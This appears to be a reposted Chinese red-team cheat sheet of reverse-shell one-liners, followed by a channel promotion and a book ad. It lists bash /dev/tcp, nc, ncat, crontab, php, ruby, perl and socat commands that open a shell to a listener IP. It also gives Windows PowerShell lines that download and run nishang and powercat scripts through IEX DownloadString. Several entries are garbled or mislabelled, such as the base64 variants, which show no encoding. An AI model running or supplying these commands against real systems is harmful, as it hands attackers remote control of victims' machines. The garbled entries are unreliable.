|
反弹shell命令速查 (qq.com)
- <p>项目作者:Threekiii </p>
- <p>项目地址:https://github.com/Threekiii/Awesome-Redteam/blob/master/tips/%E5%8F%8D%E5%BC%B9shell%E5%91%BD%E4%BB%A4%E9%80%9F%E6%9F%A5.md</p>
复制代码
一、反弹Shell-Linux
- <code>【监听端】centos: 192.168.35.152</code>
复制代码
1、bash
- <code>┌──(root@kali)-[/home/kali]</code>
复制代码
2、bash base64
- <code># /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1</code>
复制代码
3、bash base64 URLencode
- <code># /bin/bash -i >& /dev/tcp/192.168.35.152/7777 0>&1</code>
复制代码
4、nc
- <code>nc -e /bin/bash 192.168.35.152 7777</code>
复制代码
5、ncat
- <code>ncat 192.168.35.152 7777 -e /bin/bash</code>
复制代码
6、curl
- <code># kali开启http服务,把bash命令写入html文件</code>
复制代码
7、http
8、crontab
- * * * * * root bash -i >& /dev/tcp/192.168.35.152/7777 0>&1
复制代码
9、whois
- <code># 只能执行指定命令,如pwd命令</code>
复制代码
10、php
- php -r '$sock=fsockopen("192.168.35.152",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
复制代码
11、ruby
- <code>ruby -rsocket -e'f=TCPSocket.open("192.168.35.152",7777).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' # 执行失败</code>
复制代码
12、socat
- socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.35.152:7777
复制代码
13、perl
- perl -e 'use Socket;$i="192.168.35.152";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
复制代码
14、php
- php -r '$sock=fsockopen("192.168.35.152",7777);exec("/bin/sh -i <&3 >&3 2>&3");'
复制代码
15、openssl
二、反弹Shell-Windows
- <code>Windows下的反弹shell仅测试了nc,执行成功。</code>
复制代码
1、powercat
- <pre><code>项目地址:https://github.com/besimorhino/powercat</code></pre><pre><code>System.Net.Webclient.DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.35.152 -p 7777 -e cmd</code></pre>
复制代码
2、nc
- nc 192.168.35.152 7777 -e c:\windows\system32\cmd.exe
复制代码
3、nishang
- <pre><code>Nishang是一个基于PowerShell的攻击框架,整合了一些PowerShell攻击脚本和有效载荷,可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。</code></pre><pre><code>项目地址:https://github.com/samratashok/nishang</code></pre><pre><code># 将nishang下载到攻击者本地,在目标机使用powershell执行以下命令</code></pre><pre><code>IEX (New-Object Net.WebClient).DownloadString('http://192.168.159.134/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.35.152 -port 7777</code></pre>
复制代码
4、Reverse UDP shell
IEX (New-Object Net.WebClient).DownloadString('http://192.168.35.152/nishang/Shells/Invoke-PowerShellUdp.ps1');- <pre><code>Invoke-PowerShellUdp -Reverse -IPAddress 192.168.35.152 -port 7777</code></pre>
复制代码
5、MSF
- <code># 找出各类反弹一句话payload的路径信息</code>
复制代码
、
欢迎关注公众号:web安全工具库
web安全工具库
将一些好用的web安全工具和自己的学习笔记分享给大家。。。
192篇原创内容
公众号
好书推荐
- 本书以CentOS Linux系统的操作实践为出发点,系统讲解Linux安装和管理的方法,从系统安装、基础命令到网络管理以及常用的系统服务,使得读者可以快速获得日常维护Linux系统和网络服务的技能。本书配套脚本源码、PPT课件与教学视频。本书共分16章。第1~10章是Linux系统的基础知识,内容涵盖CentOS Stream 8的安装方法、常见的Linux命令、vi编辑器、文件系统和磁盘管理、日志系统管理、用户管理、应用程序管理、Shell基础知识、进程管理和网络管理;第11~16章是各项流行的网络服务的安装和配置方法,主要包括防火墙和DHCP、NFS、Samba、FTP、域名解析、邮件服务、Squid以及无人值守安装Linux。
复制代码
|
|